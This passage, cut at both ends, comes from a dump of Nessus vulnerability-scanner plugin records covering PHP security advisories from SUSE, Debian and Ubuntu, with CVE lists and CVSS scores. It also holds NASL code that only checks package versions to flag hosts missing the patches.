reference:\"php5-zip-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-109.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-01T01:55:41", "description": "Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language :\n\n - CVE-2017-11142\n Denial of service via overly long form variables\n\n - CVE-2017-11143\n Invalid free() in wddx_deserialize()\n\n - CVE-2017-11144\n Denial of service in openssl extension due to incorrect\n return value check of OpenSSL sealing function.\n\n - CVE-2017-11145\n Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628\n Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12933\n Buffer overread in finish_nested_data()\n\n - CVE-2017-16642\n Out-of-bounds read in timelib_meridian()", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-09T00:00:00", "title": "Debian DSA-4081-1 : php5 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12933", "CVE-2017-11143", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:php5"], "id": "DEBIAN_DSA-4081.NASL", "href": "https://www.tenable.com/plugins/nessus/105664", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4081. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105664);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2017-11142\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\");\n script_xref(name:\"DSA\", value:\"4081\");\n\n script_name(english:\"Debian DSA-4081-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language :\n\n - CVE-2017-11142\n Denial of service via overly long form variables\n\n - CVE-2017-11143\n Invalid free() in wddx_deserialize()\n\n - CVE-2017-11144\n Denial of service in openssl extension due to incorrect\n return value check of OpenSSL sealing function.\n\n - CVE-2017-11145\n Out-of-bounds read in wddx_deserialize()\n\n - CVE-2017-11628\n Buffer overflow in PHP INI parsing API\n\n - CVE-2017-12933\n Buffer overread in finish_nested_data()\n\n - CVE-2017-16642\n Out-of-bounds read in timelib_meridian()\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11145\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-11628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-12933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-16642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4081\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the oldstable distribution (jessie), these problems have been\nfixed in version 5.6.33+dfsg-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libphp5-embed\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php-pear\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cgi\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-cli\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-common\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-curl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dbg\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-dev\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-enchant\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-fpm\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gd\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-gmp\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-imap\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-interbase\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-intl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-ldap\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mcrypt\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysql\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-mysqlnd\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-odbc\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pgsql\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-phpdbg\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-pspell\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-readline\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-recode\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-snmp\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sqlite\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-sybase\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-tidy\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xmlrpc\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"php5-xsl\", reference:\"5.6.33+dfsg-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-03-01T07:33:05", "description": "It was discovered that the PHP opcache created keys for files it\ncached based on their filepath. A local attacker could possibly use\nthis issue in a shared hosting environment to obtain sensitive\ninformation. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain\nURI components. A remote attacker could possibly use this issue to\nbypass hostname-specific URL checks. This issue only affected Ubuntu\n14.04 LTS. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean\nparameters when unserializing data. A remote attacker could possibly\nuse this issue to cause PHP to crash, resulting in a denial of\nservice. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP\nincorrectly handled the OpenSSL sealing function. A remote attacker\ncould possibly use this issue to cause PHP to crash, resulting in a\ndenial of service. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension\nincorrectly handled memory. A remote attacker could possibly use this\nissue to disclose sensitive information from the server.\n(CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives.\nA remote attacker could use this issue to cause PHP to crash or\ndisclose sensitive information. This issue only affected Ubuntu 14.04\nLTS. (CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote\nattacker could possibly use this issue to cause PHP to crash,\nresulting in a denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing\nini files. An attacker could possibly use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain\nregular expressions. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227,\nCVE-2017-9228, CVE-2017-9229).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-11T00:00:00", "title": "Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : php5, php7.0 vulnerabilities (USN-3382-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-9224", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2015-8994", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi", "p-cpe:/a:canonical:ubuntu_linux:php7.0-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "cpe:/o:canonical:ubuntu_linux:17.04", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0", "cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm", "p-cpe:/a:canonical:ubuntu_linux:php5-fpm", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3382-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102416", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3382-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102416);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2015-8994\", \"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11362\", \"CVE-2017-11628\", \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\", \"CVE-2017-9229\");\n script_xref(name:\"USN\", value:\"3382-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS / 17.04 : php5, php7.0 vulnerabilities (USN-3382-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the PHP opcache created keys for files it\ncached based on their filepath. A local attacker could possibly use\nthis issue in a shared hosting environment to obtain sensitive\ninformation. This issue only affected Ubuntu 14.04 LTS.\n(CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain\nURI components. A remote attacker could possibly use this issue to\nbypass hostname-specific URL checks. This issue only affected Ubuntu\n14.04 LTS. (CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean\nparameters when unserializing data. A remote attacker could possibly\nuse this issue to cause PHP to crash, resulting in a denial of\nservice. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP\nincorrectly handled the OpenSSL sealing function. A remote attacker\ncould possibly use this issue to cause PHP to crash, resulting in a\ndenial of service. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension\nincorrectly handled memory. A remote attacker could possibly use this\nissue to disclose sensitive information from the server.\n(CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives.\nA remote attacker could use this issue to cause PHP to crash or\ndisclose sensitive information. This issue only affected Ubuntu 14.04\nLTS. (CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote\nattacker could possibly use this issue to cause PHP to crash,\nresulting in a denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing\nini files. An attacker could possibly use this issue to cause PHP to\ncrash, resulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain\nregular expressions. A remote attacker could use this issue to cause\nPHP to crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227,\nCVE-2017-9228, CVE-2017-9229).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3382-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php7.0-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cgi\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-cli\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"php5-fpm\", pkgver:\"5.5.9+dfsg-1ubuntu4.22\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libapache2-mod-php7.0\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cgi\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-cli\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"php7.0-fpm\", pkgver:\"7.0.22-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libapache2-mod-php7.0\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-cgi\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-cli\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"php7.0-fpm\", pkgver:\"7.0.22-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache2-mod-php5 / libapache2-mod-php7.0 / php5-cgi / php5-cli / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T14:48:18", "description": "This update for php53 fixes the several issues. These security issues\nwere fixed :\n\n - CVE-2017-12933: The finish_nested_data function in\n ext/standard/var_unserializer.re was prone to a buffer\n over-read while unserializing untrusted data.\n Exploitation of this issue could have had an unspecified\n impact on the integrity of PHP (bsc#1054430).\n\n - CVE-2017-11628: Stack-based buffer overflow in the\n zend_ini_do_op() function in Zend/zend_ini_parser.c\n could have caused a denial of service or potentially\n allowed executing code (bsc#1050726).\n\n - CVE-2017-7890: The GIF decoding function\n gdImageCreateFromGifCtx in the GD Graphics Library did\n not zero colorMap arrays use. A specially crafted GIF\n image could use the uninitialized tables to read ~700\n bytes from the top of the stack, potentially disclosing\n sensitive information (bsc#1050241).\n\n - CVE-2016-5766: Integer overflow in the _gd2GetHeader in\n the GD Graphics Library (aka libgd) allowed remote\n attackers to cause a denial of service (heap-based\n buffer overflow and application crash) or possibly have\n unspecified other impact via crafted chunk dimensions in\n an image (bsc#986386).\n\n - CVE-2017-11145: An error in the date extension's\n timelib_meridian parsing code could have been used by\n attackers able to supply date strings to leak\n information from the interpreter, related to\n ext/date/lib/parse_date.c out-of-bounds reads affecting\n the php_parse_date function (bsc#1048112).\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could have lead to\n information leak [bsc#1048111]\n\n - CVE-2016-10397: Incorrect handling of various URI\n components in the URL parser could have been used by\n attackers to bypass hostname-specific URL checks\n (bsc#1047454).\n\n - CVE-2017-11147: The PHAR archive handler could have been\n used by attackers supplying malicious archive files to\n crash the PHP interpreter or potentially disclose\n information due to a buffer over-read in the\n phar_parse_pharfile function (bsc#1048094).\n\n - CVE-2017-11144: The openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could have lead to a crash of the PHP\n interpreter (bsc#1048096).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-19T00:00:00", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2017:2522-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2016-10168", "CVE-2017-12933", "CVE-2017-11146", "CVE-2017-11628", "CVE-2017-11147", "CVE-2016-5766", "CVE-2017-7890", "CVE-2017-11145", "CVE-2017-11144"], "modified": "2017-09-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-bz2", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:php53-zlib", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-exif"], "id": "SUSE_SU-2017-2522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103317", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2522-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103317);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10168\", \"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-7890\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2017:2522-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is 